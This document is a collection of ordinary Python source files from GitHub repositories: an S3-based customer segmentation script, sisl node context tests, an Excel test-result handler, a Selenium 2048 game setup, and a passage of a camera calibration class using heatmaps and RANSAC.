+{"seq_id":"70237120516","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport boto3\r\nimport csv\r\ncolor = sns.color_palette()\r\nfrom IPython.display import display, HTML\r\n# Creating the low-level functional client\r\n# NOTE: credentials redacted -- never hard-code real AWS keys in source code\r\nclient = boto3.client(\r\n 's3',\r\n aws_access_key_id = 'YOUR_AWS_ACCESS_KEY_ID',\r\n aws_secret_access_key = 'YOUR_AWS_SECRET_ACCESS_KEY',\r\n region_name = 'us-east-2'\r\n)\r\nclientResponse = client.list_buckets()\r\n \r\n# Print the bucket names one by one\r\nprint('Printing bucket names...')\r\nfor bucket in clientResponse['Buckets']:\r\n print(f'Bucket Name: {bucket[\"Name\"]}')\r\n\r\n# Create the S3 object\r\nobj = client.get_object(\r\n Bucket = 'segmentationaws12',\r\n Key = 'Online_Retail.xlsx'\r\n)\r\n \r\n# Read data from the S3 object\r\ndf = pd.read_excel(obj['Body'])\r\nprint(df.head(10))\r\ndf.shape\r\ndf['Total_Price'] = df['UnitPrice']*df['Quantity']\r\n\r\ntst = df.groupby(['InvoiceDate','InvoiceNo'])\r\n \r\ntst.size()\r\n\r\n# converting InvoiceDate to a YYYYMM integer\r\ndf['date'] = df['InvoiceDate'].map(lambda x: 100*x.year + x.month)\r\n\r\ntst = df.groupby(['date'])\r\ntst.size()\r\n\r\n# checking country-wise sales \r\nCust_country=df[['Country','CustomerID']].drop_duplicates()\r\n\r\n#Calculating the distinct count of customers for each country\r\nCust_country_count=Cust_country.groupby(['Country'])['CustomerID'].\\\r\naggregate('count').reset_index().sort_values('CustomerID', ascending=False)\r\n\r\n#Plotting the 
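The hard-coded credentials in the original were redacted above; the safer, conventional pattern is to let boto3 pick credentials up from the environment or ~/.aws/credentials (a sketch, not part of the original script):

import os
import boto3

# boto3's default credential chain reads AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY
client = boto3.client('s3', region_name=os.environ.get('AWS_REGION', 'us-east-2'))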
count of customers\r\ncountry=list(Cust_country_count['Country'])\r\nCust_id=list(Cust_country_count['CustomerID'])\r\nplt.figure(figsize=(12,8))\r\nsns.barplot(country, Cust_id, alpha=0.8, color=color[2])\r\nplt.xticks(rotation='60')\r\nplt.show()\r\n\r\nCust_date_UK=df[df['Country']=='United Kingdom']\r\nCust_date_UK=Cust_date_UK[['CustomerID','date']].drop_duplicates()\r\n\r\ndef recency(row):\r\n if row['date']>201110:\r\n val = 5\r\n elif row['date'] <= 201110 and row['date'] > 201108:\r\n val = 4\r\n elif row['date'] <= 201108 and row['date'] > 201106:\r\n val = 3\r\n elif row['date'] <= 201106 and row['date'] > 201104:\r\n val = 2\r\n else:\r\n val = 1\r\n return val\r\n\r\nCust_date_UK['Recency_Flag'] = Cust_date_UK.apply(recency, axis=1)\r\nCust_date_UK.head()\r\ntst = Cust_date_UK.groupby('Recency_Flag')\r\ntst.size()\r\nCust_freq=df[['Country','InvoiceNo','CustomerID']].drop_duplicates()\r\nCust_freq.head()\r\n\r\n#Calculating the count of unique purchase for each customer and his buying freq in descending order\r\nCust_freq_count=Cust_freq.groupby(['Country','CustomerID'])['InvoiceNo'].aggregate('count').\\\r\nreset_index().sort_values('InvoiceNo', ascending=False)\r\n\r\n\r\nCust_freq_count_UK=Cust_freq_count[Cust_freq_count['Country']=='United Kingdom']\r\nCust_freq_count_UK.head()\r\nunique_invoice=Cust_freq_count_UK[['InvoiceNo']].drop_duplicates()\r\nunique_invoice['Freqency_Band'] = pd.qcut(unique_invoice['InvoiceNo'], 5)\r\nunique_invoice=unique_invoice[['Freqency_Band']].drop_duplicates()\r\nunique_invoice\r\n\r\ndef frequency(row):\r\n if row['InvoiceNo'] <= 13:\r\n val = 1\r\n elif row['InvoiceNo'] > 13 and row['InvoiceNo'] <= 25:\r\n val = 2\r\n elif row['InvoiceNo'] > 25 and row['InvoiceNo'] <= 38:\r\n val = 3\r\n elif row['InvoiceNo'] > 38 and row['InvoiceNo'] <= 55:\r\n val = 4\r\n else:\r\n val = 5\r\n return val\r\n\r\nCust_freq_count_UK['Freq_Flag'] = Cust_freq_count_UK.apply(frequency, axis=1)\r\nCust_freq_count_UK.groupby(['Freq_Flag']).size()\r\nplt.figure(figsize=(12,8))\r\nsns.countplot(x='Freq_Flag', data=Cust_freq_count_UK, color=color[1])\r\nplt.ylabel('Count', fontsize=12)\r\nplt.xlabel('Freq_Flag', fontsize=12)\r\nplt.xticks(rotation='vertical')\r\nplt.title('Frequency of Freq_Flag', fontsize=15)\r\nplt.show()\r\nCust_monetary = df.groupby(['Country','CustomerID'])['Total_Price'].aggregate('sum').\\\r\nreset_index().sort_values('Total_Price', ascending=False)\r\nCust_monetary_UK=Cust_monetary[Cust_monetary['Country']=='United Kingdom']\r\n\r\nunique_price=Cust_monetary_UK[['Total_Price']].drop_duplicates()\r\nunique_price=unique_price[unique_price['Total_Price'] > 0]\r\nunique_price['monetary_Band'] = pd.qcut(unique_price['Total_Price'], 5)\r\nunique_price=unique_price[['monetary_Band']].drop_duplicates()\r\nunique_price\r\ndef monetary(row):\r\n if row['Total_Price'] <= 243:\r\n val = 1\r\n elif row['Total_Price'] > 243 and row['Total_Price'] <= 463:\r\n val = 2\r\n elif row['Total_Price'] > 463 and row['Total_Price'] <= 892:\r\n val = 3\r\n elif row['Total_Price'] > 892 and row['Total_Price'] <= 1932:\r\n val = 4\r\n else:\r\n val = 5\r\n return val\r\nCust_monetary_UK['Monetary_Flag'] = Cust_monetary_UK.apply(monetary, axis=1)\r\nCust_monetary_UK.groupby(['Monetary_Flag']).size()\r\n\r\nplt.figure(figsize=(12,8))\r\nsns.countplot(x='Monetary_Flag', data=Cust_monetary_UK, color=color[1])\r\nplt.ylabel('Count', fontsize=12)\r\nplt.xlabel('Monetary_Flag', fontsize=12)\r\nplt.xticks(rotation='vertical')\r\nplt.title('Frequency of Monetary_Flag', 
fontsize=15)\r\nplt.show()\r\n\r\nCust_UK_All=pd.merge(Cust_date_UK,Cust_freq_count_UK[['CustomerID','Freq_Flag']],\\\r\non=['CustomerID'],how='left')\r\nCust_UK_All=pd.merge(Cust_UK_All,Cust_monetary_UK[['CustomerID','Monetary_Flag']],\\\r\non=['CustomerID'],how='left')\r\n\r\n\r\nCust_UK_All.head(10)","repo_name":"Bala05104/Customer-segmentation","sub_path":"segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4255807554","text":"import pytest\n\nfrom sisl.nodes import Node, Workflow\nfrom sisl.nodes.context import temporal_context\n\n\ndef test_node():\n @Node.from_func\n def sum_node(a, b):\n return a + b\n\n with temporal_context(lazy=True):\n val = sum_node(a=2, b=3)\n assert isinstance(val, sum_node)\n assert val.get() == 5\n\n with temporal_context(lazy=False):\n val = sum_node(a=2, b=3)\n assert val == 5\n\n\ndef test_node_inside_node():\n \"\"\"When a node class is called inside another node, it should never be lazy in its computation.\n\n That is, calling a node within another node is like calling a function.\n \"\"\"\n\n @Node.from_func\n def shift(a):\n return a + 1\n\n @Node.from_func\n def sum_node(a, b):\n a = shift(a)\n return a + b\n\n with temporal_context(lazy=True):\n val = sum_node(a=2, b=3)\n assert isinstance(val, sum_node)\n assert val.get() == 6\n\n with temporal_context(lazy=False):\n val = sum_node(a=2, b=3)\n assert val == 6\n\n\n@pytest.mark.parametrize(\"nodes_lazy\", [True, False])\ndef test_workflow(nodes_lazy):\n def sum_node(a, b):\n return a + b\n\n @Workflow.from_func\n def my_workflow(a, b, c):\n first_sum = sum_node(a, b)\n return sum_node(first_sum, c)\n\n with temporal_context(context=Node.context, lazy=nodes_lazy):\n # It shouldn't matter whether nodes have lazy computation on or off for the working of the workflow\n with temporal_context(context=Workflow.context, lazy=True):\n val = my_workflow(a=2, b=3, c=4)\n assert isinstance(val, my_workflow)\n assert val.get() == 9\n\n with temporal_context(context=Workflow.context, lazy=False):\n val = my_workflow(a=2, b=3, c=4)\n assert val == 9\n\n\ndef test_instance_context():\n @Node.from_func\n def sum_node(a, b):\n return a + b\n\n sum_node.context.update(lazy=True)\n\n # By default, an instance should behave as the class context specifies,\n # so in this case the node should not automatically recalculate\n val = sum_node(a=2, b=3)\n assert isinstance(val, sum_node)\n assert val.get() == 5\n\n val.update_inputs(a=8)\n assert val._nupdates == 1\n\n # However, we can set a specific context for the instance.\n val2 = sum_node(a=2, b=3)\n assert isinstance(val2, sum_node)\n assert val2.get() == 5\n\n val2.context.update(lazy=False)\n\n val2.update_inputs(a=8)\n assert val2._nupdates == 2\n\n # And it shouldn't affect the other instance\n val.update_inputs(a=7)\n assert val._nupdates == 1\n\n\n@pytest.mark.parametrize(\"lazy_init\", [True, False])\ndef test_default_context(lazy_init):\n \"\"\"Test that the default context is set correctly for a node class.\"\"\"\n\n @Node.from_func\n def calc(val: int):\n return val\n\n @Node.from_func(context={\"lazy\": False, \"lazy_init\": lazy_init})\n def alert_change(val: int):\n ...\n\n val = calc(1)\n\n init_nupdates = 0 if lazy_init else 1\n\n # We feed the node that produces the intermediate value into our alert node\n my_alert = alert_change(val=val)\n\n val.get()\n assert my_alert._nupdates == init_nupdates\n 
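    # Updating the producer's input below should propagate exactly one recomputation
    # to the non-lazy alert node; lazy_init only affects whether the very first update ran.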
val.update_inputs(val=2)\n assert my_alert._nupdates == init_nupdates + 1\n","repo_name":"zerothi/sisl","sub_path":"src/sisl/nodes/tests/test_context.py","file_name":"test_context.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"11343115520","text":"from openpyxl import *\nfrom openpyxl.styles import Alignment, PatternFill\nfrom datetime import *\nimport globals\n\n\nConfigWB = load_workbook(filename=globals.ConfigPath)\nPathWS = ConfigWB['PATHS']\nEtcWS = ConfigWB['ETC']\nProjectsWS = ConfigWB['PROJECTS']\nProjectPath = PathWS.cell(row=1, column=2).value\nTestResultPath = PathWS.cell(row=2, column=2).value\nWaitTime = EtcWS.cell(row=1,column=2).value\nDriverPath = globals.ProjectPath + \"etc\\\\chromedriver.exe\"\nwb = load_workbook(filename=globals.test_suite_path)\nws = wb[globals.test_sheet]\ntotal_cases = int(str(ws.cell(row=ws.max_row, column=1).value).strip())\nRepoSheet = wb['REPO']\n\ndef get_test_data(test_id,test_step):\n row_no = 3\n end_row = ws.max_row\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n test_data = str(ws.cell(row=row_no, column=4).value).strip()\n return test_data\n\n elif ws.cell(row=row_no, column=1).value != None and int(str(ws.cell(row=row_no, column=1).value).strip()) > int(test_id):\n break\n row_no = row_no + 1\n\n\ndef test_status(test_id,test_step,test_status):\n row_no = 3\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n if test_status.lower() == 'pass':\n ws.cell(row=row_no, column=9).fill = PatternFill(start_color='0000FF00',end_color='0000FF00',fill_type='solid')\n if test_status.lower() == 'fail':\n ws.cell(row=row_no, column=9).fill = PatternFill(start_color='FFFF0000',end_color='FFFF0000',fill_type='solid')\n if test_status.lower() == 'pending':\n ws.cell(row=row_no, column=9).fill = PatternFill(start_color='00FFFF00',end_color='00FFFF00',fill_type='solid')\n ws.cell(row=row_no, column=9).value = test_status\n ws.cell(row=row_no, column=10).value = datetime.now()\n\n elif ws.cell(row=row_no, column=1).value != None and int(str(ws.cell(row=row_no, column=1).value).strip()) > int(test_id):\n break\n row_no = row_no + 1\n save_test_resut(ws)\n\n\ndef AutomationException(test_id,test_step,exception):\n row_no = 3\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n ws.cell(row=row_no, column=11).value = exception\n\n elif ws.cell(row=row_no, column=1).value != None and int(str(ws.cell(row=row_no, column=1).value).strip()) > int(test_id):\n break\n row_no = row_no + 1\n\n save_test_resut(ws)\n\n\ndef WriteTestparameters(test_id,test_step,**kwargs):\n row_no = 3\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n col=12\n for key, value in kwargs.items():\n ws.cell(row=row_no, column=col).value = key + \"=\" + value\n col = col + 1\n\n elif ws.cell(row=row_no, column=1).value != None and int(str(ws.cell(row=row_no, column=1).value).strip()) > int(test_id):\n break\n row_no = row_no + 1\n save_test_resut(ws)\n\ndef get_element_repo(ElementName):\n row_no 
= 2\n end_row = RepoSheet.max_row\n while row_no <= RepoSheet.max_row:\n\n if ElementName == str(RepoSheet.cell(row=row_no, column=2).value).strip():\n IdentifierType = str(RepoSheet.cell(row=row_no, column=3).value).strip()\n ElementType = str(RepoSheet.cell(row=row_no, column=4).value).strip()\n ElementIdentifier = str(RepoSheet.cell(row=row_no, column=5).value).strip()\n Action = str(RepoSheet.cell(row=row_no, column=6).value).strip()\n #print(ElementName, IdentifierType, ElementType, ElementIdentifier, Action)\n return IdentifierType, ElementType, ElementIdentifier, Action\n row_no = row_no + 1\n\ndef get_expected_result(test_id, test_step):\n row_no = 3\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n expected_result = str(ws.cell(row=row_no, column=8).value).strip().split('::')[2]\n expected_result_variables = expected_result.split(' == ')[0]\n expected_result_values = expected_result.split(' == ')[1]\n expected_result_variable_list = expected_result_variables.split(';;')\n expected_values_list = expected_result_values.split(';;')\n row_no = row_no + 1\n for n in range(0,len(expected_result_variable_list)):\n expected_result_variable_list[n] = expected_result_variable_list[n].split('||')\n expected_values_list[n] = expected_values_list[n].split('||')\n return expected_result_variable_list, expected_values_list\n\ndef compare_actual_and_excepted_result(test_id, test_step, expected_result_variable_list, expected_values_list, actual_value_list):\n #print(expected_result_variable_list, expected_values_list, actual_value_list)\n test_result = True\n for n in range(len(expected_result_variable_list)):\n row_no = 3\n while row_no <= ws.max_row:\n if str(ws.cell(row=row_no, column=1).value).strip() == str(test_id):\n if str(ws.cell(row=row_no, column=6).value).strip() == str(test_step):\n print_text = ''\n my_test_result = False\n ws.cell(row=row_no, column=n+12).fill = PatternFill(start_color='FFFF0000',end_color='FFFF0000',fill_type='solid')\n for m in range(0,len(expected_result_variable_list[n])):\n print_text = print_text + (expected_result_variable_list[n])[m] + \": EXPECTED= '\" + (expected_values_list[n])[m] + \"' ACTUAL= '\" + (actual_value_list[n])[m] + \"'\" + ' OR' + '\\n'\n if (expected_values_list[n])[m] == (actual_value_list[n])[m]:\n my_test_result = True\n ws.cell(row=row_no, column=n+12).fill = PatternFill(start_color='0000FF00',end_color='0000FF00',fill_type='solid')\n ws.cell(row=row_no, column=n+12).alignment = Alignment(wrap_text=True)\n ws.cell(row=row_no, column=n+12).value = print_text\n test_result = my_test_result * test_result\n #print(print_text)\n\n elif ws.cell(row=row_no, column=1).value != None and int(str(ws.cell(row=row_no, column=1).value).strip()) > int(test_id):\n break\n row_no = row_no + 1\n\n save_test_resut(ws)\n if test_result:\n test_status(test_id,test_step,'PASS')\n else:\n test_status(test_id,test_step,'FAIL')\n\n\ndef save_test_resut(ws):\n wb.save(str(globals.ProjectPath) + \"\\\\test_suite\\\\\" + str(globals.project) + \"\\\\\" + str(globals.test_sheet) + \"_test_result.xlsx\")\n\nwb.close()\n","repo_name":"smackchis/jatayu","sub_path":"test_sheet_handler.py","file_name":"test_sheet_handler.py","file_ext":"py","file_size_in_byte":7292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14331366638","text":"def __init__(self):\n self.url = 
'https://mariamingallonmm.github.io/AI-SearchAlgorithm-A2-2048puzzle/'\n self.driver = webdriver.Chrome(ChromeDriverManager().install()) # Optional argument, if not specified will search path.\n self.driver.get(self.url)\n self.body = self.driver.find_element_by_tag_name('body')\n self.moves = {\n 0: Keys.ARROW_UP,\n 1: Keys.ARROW_DOWN,\n 2: Keys.ARROW_LEFT,\n 3: Keys.ARROW_RIGHT\n }\n","repo_name":"mariamingallonMM/AI-SearchAlgorithm-A2-2048puzzle","sub_path":"GameManager_init.py","file_name":"GameManager_init.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"28328359248","text":"''' A Class to Perform Calibration '''\n\n\nimport os\nimport numpy as np\nimport glob\nimport logging\nimport random\nimport matplotlib.pyplot as plt\nimport sys\n\nfrom models.GetSubPixel import GetSubPixels\nfrom models.OpenCVCalibGivenPoints import CalibGivenPoints\nfrom settings.settings import *\nfrom utils.utils import *\n\nclass Calib(object):\n \"\"\"Perform Calibration\n \"\"\"\n def __init__(self, img_size, log_name= ''):\n \"\"\"\n Args;\n img_size = [x_size, y_size]\n \"\"\"\n self.subpixel_exactor = GetSubPixels(save_path='',show_flag=False)\n\n self.chessboardsize = chessboardsize\n self.calibtor = CalibGivenPoints(chessboardsize, '', 40)\n\n self.size = 480\n self.img_size = img_size\n self.x_ratio = self.size / img_size[0]\n self.y_ratio = self.size / img_size[1]\n self.corner_num = corner_num\n self.img_path = r''\n self.log_file_path = os.path.join(LOGFILEPATH, 'calib_'+log_name+'.txt')\n log_init(self.log_file_path)\n\n def load_heatmaps(self, heatmap_list):\n \"\"\"load imgs by list\n \"\"\"\n img_num = len(heatmap_list)\n heatmaps = []\n heatmap_names = []\n\n for heatmap_name in heatmap_list:\n heatmap_temp = np.load(heatmap_name)\n # name_temp = heatmap_name.split('/')[-1] # mac\n name_temp = heatmap_name.split('\\\\')[-1] # win\n heatmaps.append(heatmap_temp)\n heatmap_names.append(name_temp)\n \n return heatmaps, heatmap_names\n \n def get_coor_from_heatmap(self, heatmap, name, sort_mod='gt', ORT=20, ref_path='', img_path='', show_flag=False):\n \"\"\"For a single heatmap\n Args:\n name: index.npy\n Returns:\n cs: ndarray 30x2\n \"\"\"\n corner_flag = False\n self.subpixel_exactor.load_distribution_map(name, heatmap, self.corner_num, chessboardsize)\n flag, cand = self.subpixel_exactor.thredshold_locate()\n if not flag:\n cs, s_err = self.subpixel_exactor.sub_pixel_localization(cand)\n if s_err > ORT:\n pass\n else:\n gt = os.path.join(ref_path, name)\n self.subpixel_exactor.load_gt_4_calibsort(gt)\n if sort_mod == 'gt':\n cs = self.subpixel_exactor.sort_by_gt_data(show_flag=False)\n cs = self.subpixel_exactor.collineation_refinement(cs)\n err = self.subpixel_exactor.cal_err()\n print('corner error=', err)\n corner_flag = True\n elif sort_mod == 'corner':\n img_name = os.path.join(img_path, name.split('.')[0]+\".jpg\")\n img = cv2.imread(img_name)\n self.subpixel_exactor.opencv_find_corner(img)\n cs = self.subpixel_exactor.sort_by_corners()\n cs = self.subpixel_exactor.collineation_refinement(cs)\n err = self.subpixel_exactor.cal_err()\n print('corner error=', err)\n corner_flag = True\n elif sort_mod == 'OR':\n img_name = os.path.join(img_path, name.split('.')[0]+\".jpg\")\n img = cv2.imread(img_name)\n flag, cs = self.subpixel_exactor.run_OR(heatmap, img)\n err = self.subpixel_exactor.cal_err()\n print('corner error=', err)\n corner_flag = flag\n cs = np.array(cs)\n else:\n return 
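The free-floating `__init__` excerpt from GameManager_init.py above ships without its class or imports; a sketch of the imports it appears to rely on (standard selenium / webdriver_manager module paths):

from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from webdriver_manager.chrome import ChromeDriverManager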
corner_flag, None\n\n return corner_flag, cs\n \n\n def get_coors_from_heatmap_list(self, heatmap_list, sort_mod='gt', ORT=20, ref_path='', img_path=''):\n \"\"\"\n Returns:\n names: [index.npy, ...]\n \"\"\"\n pose_num = len(heatmap_list)\n corners = []\n names = []\n \n for i in range(pose_num):\n heatmap = np.load(heatmap_list[i])\n name = heatmap_list[i].split('\\\\')[-1]\n corner_flag, cs = self.get_coor_from_heatmap(heatmap, name, sort_mod=sort_mod, ORT=ORT, ref_path=ref_path, img_path=img_path)\n if corner_flag:\n corners.append(cs.astype('float32'))\n names.append(name)\n \n return corners, names\n \n def calib(self, heatmap_list, sort_mod='gt', ORT=20, img_path='', ref_path='',fix_CM_flag=False, f=0, p=0):\n \"\"\"calib with a set of heatmaps\n \"\"\"\n img_num = len(heatmap_list)\n\n heatmaps, heatmap_names = self.load_heatmaps(heatmap_list)\n corners = []\n corner_names = []\n print('Get sub-pixel corners...')\n for i, heatmap in enumerate(heatmaps):\n flag, cs = self.get_coor_from_heatmap(heatmap, heatmap_names[i], sort_mod, ORT, ref_path, img_path)\n if flag:\n corners.append(cs.astype('float32'))\n corner_names.append(heatmap_names[i])\n else:\n img_num -= 1\n self.calibtor.img_number = img_num\n self.calibtor.get_o_points()\n print(f'Calibration with {img_num} images.')\n self.calibtor.img_points = corners\n if fix_CM_flag:\n ret, mtx, dist, rvecs, tvecs = self.calibtor.calib_with_fix_IM(f,p)\n \n else:\n ret, mtx, dist, rvecs, tvecs = self.calibtor.calibrate()\n \n return ret, mtx, dist, rvecs, tvecs\n\n def calib_by_subpixel_res(self,subpixel_list, fix_flag=False, fx=0, fy=0, px=0, py=0):\n \"\"\"\n \"\"\"\n corners = []\n pose_num = len(subpixel_list)\n for subpixel in subpixel_list:\n cs_t = np.load(subpixel)\n corners.append(cs_t.astype('float32')) \n\n self.calibtor.img_number = pose_num\n self.calibtor.get_o_points()\n print(f'Calibration with {pose_num} images.')\n self.calibtor.img_points = corners\n if fix_flag:\n ret, mtx, dist, rvecs, tvecs = self.calibtor.calib_with_fix_IM(fx,fy,px,py)\n else:\n ret, mtx, dist, rvecs, tvecs = self.calibtor.calibrate()\n \n return ret, mtx, dist, rvecs, tvecs\n\n def save_subpixel_corners(self, heatmap_path, sort_mod='gt', ORT=20, ref_path='', img_path='', save_path=r''):\n \"\"\"save subpixel coordinates\n \"\"\"\n heatmap_list = self.get_all_heatmaps(heatmap_path)\n corners, names = self.get_coors_from_heatmap_list(heatmap_list, sort_mod, ORT, ref_path, img_path)\n for i, corner in enumerate(corners):\n np.save(os.path.join(save_path, names[i]), corner)\n \n print(f'save subpixel corners in {save_path}')\n\n def calib_by_RANSAC_practical(self, heatmap_folder, subpixel_path, max_iter_num=100, least_pose_num=20, outlier_threshold=0.8, inlier_threshold=2/3, sort_mod='gt', ORT=20, ref_path=r'', ref_mod='gt',save_flag=False, draw_flag=False):\n \"\"\"\n Args:\n least_pose_num : use <=* images to calib every time\n outlier_threshold : if RPE > *, set it as outlier\n inlier_threshold: if inliers numbers > (* x img_num) -> stop calib \n \"\"\"\n if save_flag:\n self.save_subpixel_corners(heatmap_folder, sort_mod,ORT,ref_path,save_path=subpixel_path)\n \n heatmap_list = glob.glob(os.path.join(heatmap_folder,'*.npy'))\n subpixel_list = glob.glob(os.path.join(subpixel_path,'*.npy'))\n total_num = len(heatmap_list)\n assert total_num > least_pose_num, 'Images Not Enough!'\n\n inlier_num = 0\n inlier_max = 0\n best_models = [] \n inlier_max_ip_error = 0\n iter_count = 0\n IPs = []\n I_nums = []\n inlier_num_threshold = int(inlier_threshold 
* total_num)\n\n while inlier_num < inlier_num_threshold and iter_count < max_iter_num:\n # get poses\n pose_list = self.__choose_pose_randomly(subpixel_path, least_pose_num)\n\n # calib to get K\n ret, mtx, _, _, _ = self.calib_by_subpixel_res(pose_list)\n fx = mtx[0,0]\n fy = mtx[1,1]\n px = mtx[0,2]\n py = mtx[1,2]\n\n # calib all fix K get Rs,ts\n print('Counting inliers...')\n _, _, dist, rvecs, tvecs = self.calib_by_subpixel_res(subpixel_list,fix_flag=True,fx=fx,fy=fy,px=px,py=py)\n\n # calculate RPEs\n RPEs = self.calibtor.call_re_projection_errors(rvecs,tvecs,mtx,dist)\n\n # count inlier numbers\n count = 0\n for RPE in RPEs:\n # print(RPE)\n if RPE < outlier_threshold:\n count+=1\n\n # change vars\n inlier_num = count\n if inlier_num > inlier_max:\n inlier_max = inlier_num\n # inlier_max_ip_error = e_ip\n best_models = []\n best_models.append(mtx)\n elif inlier_num == inlier_max:\n best_models.append(mtx)\n iter_count+=1\n\n return best_models\n \n def calib_RANSAC_OpenCV(self,img_folder, max_iter_num=3, least_pose_num=20, outlier_threshold=0.1, inlier_threshold=2/3):\n \"\"\"\n You are recommended to use large max_iter_num to acquire better model.\n Args:\n least_pose_num : use <= ([]ximages) to calib every time\n outlier_threshold : if RPE > [], set it as outlier\n inlier_threshold: if inliers numbers > ([] x img_num) -> stop calib \n Returns:\n a list of Intrinsic parameters with max Inlier number\n You should choose one of them and NOT choose the one much different from others.\n \"\"\"\n \n img_list = glob.glob(os.path.join(img_folder,'*.jpg'))\n total_num = len(img_list)\n assert total_num > least_pose_num, 'Images Not Enough!'\n\n inlier_num = 0\n inlier_max = 0\n best_models = []\n inlier_max_ip_error = 0\n iter_count = 0\n IPs = []\n I_nums = []\n inlier_num_threshold = int(inlier_threshold * total_num)\n\n while inlier_num < inlier_num_threshold and iter_count < max_iter_num:\n # get poses\n img_list_per_calib = self.__choose_img_randomly(img_list, least_pose_num)\n\n # calib to get K\n self.calibtor.load_imglist(img_list_per_calib)\n self.calibtor.get_points_by_images()\n ret, mtx, _, _, _ = self.calibtor.calibrate()\n fx = mtx[0,0]\n fy = mtx[1,1]\n px = mtx[0,2]\n py = mtx[1,2]\n\n # calib all fix K get Rs,ts\n print('Counting inliers...')\n self.calibtor.load_imglist(img_list)\n self.calibtor.get_points_by_images()\n _, _, dist, rvecs, tvecs = self.calibtor.calib_with_fix_IM(fx=fx,fy=fy,px=px,py=py)\n\n # calculate RPEs\n RPEs = self.calibtor.call_re_projection_errors(rvecs,tvecs,mtx,dist)\n\n # count inlier numbers\n count = 0\n for RPE in RPEs:\n # print(RPE)\n if RPE < outlier_threshold:\n count+=1\n\n # print(f'{count} inliers with IP error = {e_ip}')\n\n # change vars\n inlier_num = count\n if inlier_num > inlier_max:\n best_models = []\n inlier_max = inlier_num\n # inlier_max_ip_error = e_ip\n best_models.append(mtx)\n elif inlier_num == inlier_max:\n best_models.append(mtx)\n iter_count+=1\n print(f'{iter_count} iter with max {inlier_max} inliers')\n\n return best_models\n \n def __call_inliers_num(self, RPEs, threshold):\n \"\"\"\n \"\"\"\n count = 0\n for rpe in RPEs:\n if rpe > threshold:\n count+=1\n return count\n\n def draw_error_distribution(self, errs_f, errs_p):\n \"\"\"\n \"\"\"\n plt.plot(errs_f, errs_p, 'ro')\n plt.show()\n\n def draw_ret_and_err_ip_distribution(self, errs_ip, rets):\n \"\"\"\n \"\"\"\n plt.plot(errs_ip, rets, 'ro')\n plt.xlabel('Intrinsic parameters error')\n plt.ylabel('Reprojection error')\n plt.show()\n\n def 
__choose_img_randomly(self, img_list, max_num):\r\n \"\"\"randomly pick a subset of image names from a given list\r\n Args:\r\n img_list: list of image file paths\r\n max_num: maximum number of images to pick\r\n \"\"\"\r\n name_list = []\r\n pose_num = random.randint(3,max_num)\r\n\r\n for i in range(pose_num):\r\n pose_index = random.randint(0, len(img_list)-1)\r\n name_temp = img_list[pose_index]\r\n if name_temp not in name_list:\r\n name_list.append(name_temp)\r\n \r\n return name_list\r\n\r\n def __choose_pose_randomly(self, folder, max_num):\r\n \"\"\"randomly pick a subset of subpixel-corner files from a given folder\r\n Args:\r\n folder: file folder path\r\n max_num: maximum number of poses to pick\r\n \"\"\"\r\n name_list = []\r\n pose_num = random.randint(3,max_num)\r\n all_subpixels = glob.glob(os.path.join(folder, '*.npy'))\r\n\r\n while(len(name_list) < pose_num):\r\n pose_index = random.randint(0, len(all_subpixels)-1)\r\n name_temp = all_subpixels[pose_index]\r\n if name_temp not in name_list:\r\n name_list.append(name_temp)\r\n \r\n return name_list\r\n \r\n def get_all_heatmaps(self, folder):\r\n \"\"\"\r\n Args:\r\n folder : /root/DetectRes/heatmap\r\n \"\"\"\r\n heatmap_list = glob.glob(os.path.join(folder, '*.npy'))\r\n\r\n return heatmap_list\r\n \r\n def show_accuracy_by_gt(self, gt_path=r'', mtx=None):\r\n \"\"\"\r\n \"\"\"\r\n gt_list = glob.glob(os.path.join(gt_path,'*.npy'))\r\n gt_temp = np.load(gt_list[0],allow_pickle=True)\r\n gt_temp = gt_temp.item()\r\n K_gt = gt_temp['K']\r\n err_f, err_p, err_ip = self.cal_accuracy_by_gt(gt_path,mtx)\r\n print(f'The ground truth intrinsic matrix is {K_gt}')\r\n print(f'The focal length error = {err_f}')\r\n print(f'The principal point error = {err_p}')\r\n print(f'The intrinsic parameters error = {err_ip}')\r\n\r\n\r\n return err_f, err_p, err_ip\r\n\r\n def cal_accuracy_by_ref_K(self, ref_K, mtx):\r\n \"\"\"\r\n \"\"\"\r\n K_gt = ref_K\r\n fx_gt = K_gt[0,0]\r\n fy_gt = K_gt[1,1]\r\n px_gt = K_gt[0,2]\r\n py_gt = K_gt[1,2]\r\n\r\n fx_pred = mtx[0,0]\r\n fy_pred = mtx[1,1]\r\n px_pred = mtx[0,2]\r\n py_pred = mtx[1,2]\r\n\r\n err_f = (abs(fx_pred-fx_gt)+abs(fy_pred-fy_gt))/2\r\n err_p = (abs(px_pred-px_gt)+abs(py_pred-py_gt))/2\r\n err_ip = (err_f+err_p)/2\r\n\r\n return err_f, err_p, err_ip\r\n\r\n def show_accuracy_by_ref_K(self,ref_K, mtx):\r\n err_f, err_p, err_ip = self.cal_accuracy_by_ref_K(ref_K, mtx)\r\n print(f'The ground truth intrinsic matrix is {ref_K}')\r\n print(f'The 